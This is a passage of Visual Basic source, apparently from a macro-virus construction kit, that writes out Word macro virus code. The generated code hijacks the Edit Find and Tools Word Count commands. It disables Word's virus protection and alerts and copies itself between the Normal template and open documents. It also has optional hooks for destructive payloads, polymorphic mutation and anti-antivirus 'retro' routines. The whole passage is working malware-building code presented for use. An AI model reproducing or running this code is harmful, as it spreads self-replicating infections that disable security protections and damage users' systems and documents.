End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbEditFind = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'EditFind macro"
Print #1, "'Executed when a user selects Edit Find from the Word menu"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub EditFind()"
Print #1,
Print #1, " Dialogs(wdDialogEditFind).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbToolsWordCount = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'ToolsWordCount macro"
Print #1, "'Executed when a user selects Tools WordCount"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub ToolsWordCount()"
Print #1,
Print #1, " Dialogs(wdDialogToolsWordCount).Show"
Print #1,
Print #1, " On Error GoTo " & VirusName
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
If frmPolymorphic.optAPMRS = True Then
Print #1, " Mutate"
Print #1,
End If
Print #1, " Application.ScreenUpdating = False"
Print #1, " Application.DisplayAlerts = wdAlertsNone"
Print #1,
Print #1, " WordBasic.DisableAutoMacros 0"
Print #1, " Options.VirusProtection = False"
Print #1,
Print #1, " Set GlobalDoc = NormalTemplate"
Print #1, " Set ActiveDoc = ActiveDocument"
Print #1,
Print #1, " GlobalInstalled = No"
Print #1, " DocumentInstalled = No"
Print #1,
Print #1, " For j = 1 To NormalTemplate.VBProject.VBComponents.Count"
Print #1, " If NormalTemplate.VBProject.VBComponents(j).Name = """ & VirusName & """ Then"
Print #1, " GlobalInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " For i = 1 To ActiveDocument.VBProject.VBComponents.Count"
Print #1, " If ActiveDocument.VBProject.VBComponents(i).Name = """ & VirusName & """ Then"
Print #1, " DocumentInstalled = Yes"
Print #1, " End If"
Print #1, " Next"
Print #1,
Print #1, " If GlobalInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " Options.SaveNormalPrompt = False"
Print #1, " End If"
Print #1,
Print #1, " If DocumentInstalled = No Then"
Print #1, " Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " End If"
Print #1,
Print #1, " Application.DisplayAlerts = wdAlertsAll"
Print #1,
If frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, VirusName & ":"
Print #1, "End Sub"
Print #1,
End If
If frmStealth.chkbToolsMacro = True Then
…